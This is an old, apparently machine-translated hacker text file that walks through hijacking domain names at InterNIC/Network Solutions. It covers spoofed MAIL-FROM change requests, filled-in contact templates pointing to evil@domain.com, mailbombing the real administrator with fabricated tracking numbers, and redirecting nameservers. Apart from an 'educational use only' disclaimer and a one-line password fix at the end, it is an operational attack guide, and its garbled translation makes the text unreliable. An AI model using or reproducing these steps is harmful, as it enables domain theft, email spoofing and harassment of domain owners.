InterNIC's handling system and domain names vulns

The sole purpose of the information contained in this release is the point
flaws in InterNIC \ 's handling system and domain names
intended for educational use only. Since this is public knowledge, it should also be in all range \ 's.
The technique described below involves an easy to follow procedure steal. Com /. Net /. Org /. Gov / domain names. Thousand.

This vulnerability has been publicly known for a long time, and there are ways to prevent it (see below).
The following procedure allows an attacker to take over domain name
allowing you to make arbitrary web address (http://www.example.com)
link to any webpage you want on the Internet. This
method of domain hijacking is constantly being used to
hijack domain names, and deface websites.


Details
Ingredients needed:
* Bomber remailer or anonymous e-mail that can spoof email addresses.
* Social engineering skills to time the e-mails.
* An e-mail in fake hotmail.com or any other free service.

Exploit:
As an example for this notice, we will take the domain name example.org. Go
to http://www.networksolutions.com and click the link that says \ "that is.
\ 'Now enter the domain name (example.org this case) in the field of
search and click the Search '\' button. This shows that the WhoIs information, which will be similar to shown below:

Registrant:
Example (ex24-DOM)
Residence

Domain name: EXAMPLE.ORG

Administrative Contact, Technical Contact, Zone Contact, Billing Contact:
DOMAIN ADMIN (ADM001) ADMINEMAIL@EXAMPLE.COM


Record updated on 00-Jan-2000.
Joined on 00-Jan-2000.
Database last updated on 3-Feb-2000 14:29:53 EST.

DNS servers in order:

NS1.EXAMPLE.COM 1.2.3.4
NS2.EXAMPLE.NET 1.2.3.5


Now you have two choices:

1) Or you can take full control of the domain, changing the Administrator \ 's information loop.
Or
2) You could simply point the domain to another host and let him recover in time alone.


Starting the first attack:

Come on
first explain the authentication system where most InterNIC
of you readers who would not have their own domain names. The
InterNIC authentication problem with is that they do not send an e-mail to
confirmation if the request is sent from the same e-mail as
person owning or contact the domain name itself! Therefore, using this flaw if someone could spoof \ 's e-mail and change any domain name's information.
Although
confirmation is required that the person to whom the domain is about to
be transferred, and that shouldn \ 't be too difficult as you would your
e-mail.

Here \ 's a step-by-step:

- Go to http://www.networksolutions.com/
- Click the link that says \ 'Make Changes'.
- Enter the domain name example.org
- You should be presented with 2 blue buttons
- Click on that says * Expert *
- Next screen would have a title \ "Select the shape that suits your needs"
- Click the link that says \ "Contact Form \ '
- Then you should see a form with 2 fields.
- In the first field enter the fist \ 's administrator (admin is example.org ADM001)
- In the next field, enter his / her e-mail (here \ 's ADMINEMAIL@EXAMPLE.COM)
- '. Modify 'Change the option \
- Now \ '. Go to Contact Information '
- Select the MAIL FROM and click the \ 'Go Contact Information Data \ ".
- Now you should see all the information about the administrative contact for the domain
name!
- In the field of e-mail change the email to your own fake email. (In this case, \ "evil@domain.com s)
- Now, \ 'Go for defining authorization system \ ".
- Again pick-MAIL FROM and enter the e-mail admin (ADMINEMAIL@EXAMPLE.COM)
- Leave the bottom option to \ 'No' and \ 'Generate Contact Form \ ".
- You should now see a model with all the information. Like this:

******** Please DO NOT REMOVE Version Number ********

Contact Version Number: 1.0

******** Please see attached detailed instructions ********

Authorization
0th. (N) and w (M) odify elete (D). Modify
0b. Auth Scheme .............: MAIL-FROM
0c. Auth-Info ...............:

Contact Information
1a. NIC Handle ..............: ADM001
1b. (I) ndividual ® ..... ole: Individual
1c. Name ....................: DOMAIN ADMIN
1d. Organization Name .......: EXAMPLE
1e. Street Address ..........:
1F. City ....................:
1g. State ...................:
1h. Postal Code .............:
1i. Country .................:
1j. Phone ............:
1k. Fax ..............:
1l. E-Mailbox ...............: evil@domain.com

Notify Information
2a. Notify Updates ..........: POST-UPDATE
2b. Notify .............. Use: USE AFTER

Authentication
3a. Auth Scheme .............: MAIL-FROM
3b. Auth-Info ...............: ADMINEMAIL@EXAMPLE.COM
3c. Public (Y / N) ............: NO


NOTE: 'Mail this form to contact me \ "NOT press the button on the bottom that says \

Copy and paste this message on their anonymous sender or mailbomber and you're ready to go, but WAIT! It \ 's not easy, now comes the hard part! When
you send this message to one hostmaster@networksolutions.com
message similar to the following will be sent to the email address of
Administrator:


Subject: [NIC-000128.4r50] Your Mail
______________________________________________________________
This is an automated response to confirm that your message was received by hostmaster@networksolutions.com. This recognition is \ "NO" confirmation that your request has been processed. You will be notified when it has been completed.

If
You would need to match nodes against this
request, please include the tracking number [NIC-000128.4r50] in
subject. The easiest way to do this is simply to respond to this message.

If
you have not done so, please come visit our site via
WWW browser or FTP pick-up and the latest model domain or revise
According to Domain Name Registration Service in URL \ 's:

Domain Name Registration Service Agreement
http://www.networksolutions.com/leg...-agreement.html
Domain Name Registration Template
ftp://www.networksolutions.com/temp...in-template.txt

Sincerely,
Network Solutions Registration Services

***********************************************

***********************************************
IMPORTANT INFORMATION
***********************************************
On January 15, 2000, Network Solutions introduced Service Agreement, Version 6.0. All versions of the Service Agreement will continue to be accepted and processed until January 31, 2000. On and after February 1, 2000, please use the Network Solutions Service Agreement, Version 6.0 model located in
ftp://www.networksolutions.com/temp...in-template.txt
for all applications of the model.

The
terms and conditions of the service are available on our
Web site at: http://www.networksolutions.com/leg...-agreement.html.
************************************************

The
zone files, that make the Internet work are usually
updated twice a day, 7 days a week at 5:00 AM and 5:00 PM
U.S. Eastern Standard Time. Calls
to be completed before the time will be included insofar as the
update file zone 12 hours and usually begin to come
effect within 5-6 hours.

If
want to modify or delete a record from existing domain name,
you can do it online, through our Service Agreement. You
may change the address \ 's registrant, replace a contact / agent
with a different contact / agent, or change the primary and / or
secondary name server information.

For
update an existing contact information, such as address
postal, e-mail address or phone number, and complete
submit the contact form to hostmaster@internic.net. This form is available on our website at http://www.networksolutions.com

For
enroll or update information on a server name,
complete and submit the form to host hostmaster@internic.net. This form is also available on our website.

Network Solutions Registration Services
e-mail: help@networksolutions.com


Now you must be thinking that this message could get you in trouble, but there is a way to get rid of this problem. Here
you \ 'll use your mailbomber Mailbomb for the guy with 20-30 messages
like, if you want your attack to be successful. The
person would see 35 messages from the same address and therefore
would delete them all and you \ 'would probably be
insurance. If he \ "would \ 'e-mail someone, then he would probably answer the wrong tracking number. The case above, the tracking number is [NIC-000128.4r50]. OK, here another difficult part. You have to open your notepad and generate similar numbers actually reach them.
You should NEVER Mailbomb the person with the same tracking number. What we mean
it is
you should never send more than one e-mails to him from
[NIC-000128.4r50] in the next e-mail, change the [NIC-000128.4r50] to
[NIC-000127, 5089] or something different. Here is a list of some numbers we generate just to give you a good idea of ​​how the scheme works.

[NIC-000127.5089]
[NIC-000128.4rg7]
[NIC-000128.523f]
[NIC-000127.53d0]
[NIC-000129.r609]
[NIC-000128.3f6y]
[NIC-000128.5d8t]
[NIC-000127.r509]
[NIC-000128.4r30]
[NIC-000127.d307]

Remember to change the number in both places. In the subject and the body of e-mail!

In case you example.org will send e-mail to ADMINEMAIL@EXAMPLE.COM ~ ~ V hostmaster@internic.net. The message subject and body are already described above.

Stop after sending him / her 10-15 messages! Now
's time \ 's to email with hostmaster@networksolutions.com
Our fake email as ADMINEMAIL@EXAMPLE.COM Then again, this
If the message is sent to the hostmaster@networksolutions.com
ADMINEMAIL@EXAMPLE.COM with the following template we created above:

******** Please DO NOT REMOVE Version Number ********

Contact Version Number: 1.0

******** Please see attached detailed instructions ********

Authorization
0th. (N) and w (M) odify elete (D). Modify
0b. Auth Scheme .............: MAIL-FROM
0c. Auth-Info ...............:

Contact Information
1a. NIC Handle ..............: ADM001
1b. (I) ndividual ® ..... ole: Individual
1c. Name ....................: DOMAIN ADMIN
1d. Organization Name .......: EXAMPLE
1e. Street Address ..........:
1F. City ....................:
1g. State ...................:
1h. Postal Code .............:
1i. Country .................:
1j. Phone ............:
1k. Fax ..............:
1l. E-Mailbox ...............: evil@domain.com

Notify Information
2a. Notify Updates ..........: POST-UPDATE
2b. Notify .............. Use: USE AFTER

Authentication
3a. Auth Scheme .............: MAIL-FROM
3b. Auth-Info ...............: ADMINEMAIL@EXAMPLE.COM
3c. Public (Y / N) ............: NO


NOTE: Do not put anything on the subject!

Just send an e-mail! NOT bombard hostmaster@networksolutions.com with more than one email. That \ 's pretty much it. Now
continue to bombard ADMINEMAIL@EXAMPLE.COM by changing the number of
tracking of time until your tracking numbers are 30-35
used!

Now all you have to do is wait. After
24 hours you could go and change the domain information and
nobody would be there to stop it because now you are the administrator
domain name!

NOTE: This attack only works in areas that have a different administrative contact your technical contact!


Starting the second attack:

This attack will succeed, even if the technical and administrative contact are the same.
The procedure is basically the same apart from the fact that this time:
Go http://www.networksolutions.com/
- Click the link that says \ 'Make Changes'.
- Enter the domain name example.org
- You should be presented with 2 blue buttons
- Click on that says * Expert *
- Next screen would have a title \ "Select the shape that suits your needs"
- Click the link that says \ 'Service Agreement \ ".
- Now when it asks for the email address, type your own.
- You should now see many fields, panic don \ 't!
- Go to the technical contact and modify the handle to FreeServers, Hypermart etc.
- Now comes the \ 'Nameserver Information \ ".
- Change the name servers for Hypermart or freeserver nameservers.
- If there is nothing in s \ '\ Optional Information \ "after that, then just delete them.
- Click on the \ "Submit this form for processing."
- It is done, the form will be sent to your e-mail.
- When the form arrives in your email, just take this part:

****
PLEASE DO NOT REMOVE Version Number or any of the information
follow when submitting for this model
hostmaster@networksolutions.com. *****

Number domain Version: 5.0

Email ******** completed according to hostmaster@networksolutions.com ********


Agreement to be bound. Through
applying a Network Solutions \ "service (s) through our
application process online or by request and register a name
domain as part of our application process template or email
using the service (s) provided by Network Solutions under the Contract
Service, Version 5.0, you acknowledge that you have read and agree to be
bound by all terms and conditions of this Agreement and any
pertinent rules or policies that are or may be published by
Network Solutions.

By
Please see the Network Solutions Service Agreement, Version 5.0
located at URL href = \
"Http://www.networksolutions.com/legal/service-agreement.html">
http://www.networksolutions.com/leg...-agreement.html.


[URL ftp://www.networksolutions.com] [11/99]

Authorization
0th. (N) ew (M) odify (D) elete .........: M Name Registration
0b. Auth Scheme .....................: MAIL-FROM
0c. Auth-Info .......................:

One. Comments ........................:

2nd. Complete Domain Name ............: example.org

Organization Using Domain Name
3a. Organization Name ................: EXAMPLE
3b. Street Address ..................:
3c. City ............................:
3D. State ...........................:
3e. CEP .....................:
3f. Country .........................:

Administrative Contact
4a. NIC Handle (if known) ...........: ADM001
4b. (I) ndividual ® ole ............: Single
4c. Name (Last, First) ..............:
4d. Organization Name ...............:
4e. Street Address ..................:
4f. City ............................:
4g. State ...........................:
4h. CEP .....................:
4i. Country .........................:
4j. Phone Number ....................:
4k. Fax ......................:
4l. ....................... Inbox:

Technical Contact
5a. NIC Handle (if known) ...........: BDM002
5b. (I) ndividual ® ole ............: Single
5c. Name (Last, First) ...............:
5d. Organization Name ...............:
5e. Street Address ..................:
5f. City ............................:
5g. State ...........................:
5h. CEP .....................:
5i. Country .........................:
5j. Phone Number ....................:
5k. Fax ......................:
5l. ....................... Inbox:

Contact Billing
6th. NIC Handle (if known) ...........: ADM001
6b. (I) ndividual ® ole ............: Single
6c. Name (Last, First) ..............:
6d. Organization Name ...............:
6e. Street Address ..................:
6f. City ............................:
6g. State ...........................:
6h. CEP .....................:
6i. Country .........................:
6j. Phone Number ....................:
6k. Fax ......................:
6l. ....................... Inbox:

Prime Name Server
7a. Primary Server Hostname .........: NS1.EXAMPLE.COM
7b. NetAddress primary Server .......: 1.2.3.4

Secondary name server (s)
8a. Secondary Server Hostname .......: NS2.EXAMPLE.NET
8b. NetAddress secondary server .....: 1.2.3.5


END OF AGREEMENT


For instructions, see:
\ "Http :/ / www.networksolutions.com / help / inst-mod.html"


- Now launch its anonymous sender or mailbomber.
- From: the domain administrator (ADMINEMAIL@EXAMPLE.COM this case).
- To: hostmaster@networksolutions.com
- Subject: (do not enter any subject, leave the field blank!
- Body: the template you created earlier.
-
You're ready to go, but before sending this email to
InterNIC, remember ADMINEMAIL@EXAMPLE.COM bombard with emails
similar but different tracking numbers, as we did in
first procedure.
- After sending 10-20 e-mails, send the above model to InterNIC.
- Continue to bombard its 40 posts. Remember to generate tracking numbers 40-50.
- This is basically it.
-
The domain would be transferred to FreeServers or Hypermart and
Then you could just activate it from there on your own
email address. Remember to use a false email.

Nameservers and handles:
------------------------
Technical FreeServers Handle: FS4394
Primary Nameserver: NS3.FREESERVERS.COM
Primary Nameserver IP Address: 209.210.67.153
Secondary Nameserver: NS4.FREESERVERS.COM
Secondary Nameserver IP Address: 209.210.67.154

Tech Hypermart Handle: DA3706-ORG
Primary Nameserver: NS1.HYPERMART.NET
Primary Nameserver IP Address: 206.253.222.65
Secondary Nameserver: NS2.HYPERMART.NET
Secondary Nameserver IP Address: 206.253.222.66

Tip ...
Possible fixes:
Enable the password mechanism CRYPT-FW. That
should prevent anyone without the password change information
domain (see the contact form for more information Internic)